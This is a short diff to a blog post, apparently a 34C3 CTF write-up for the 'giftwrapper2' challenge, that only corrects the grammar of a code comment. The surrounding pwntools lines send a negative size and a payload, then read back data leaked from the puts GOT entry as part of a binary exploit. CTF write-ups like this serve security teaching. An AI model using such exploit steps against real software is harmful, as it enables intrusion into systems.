Segflow/blog/content/post/34c3-ctf-giftwrapper2.md

 r.sendlineafter("|> ", "-1")  # set the size to -1
 r.sendlineafter("|> ", payload)  # send the payload

-# Get the last sended line, this contain raw data read from *puts_got
+# Get the last sent line, this contains raw data read from *puts_got
 r.recvuntil("Wow!
 This looks so beautiful\n")  # recv the data
 data = r.recvline().strip()
 print(repr(data)) # print raw data so we can verify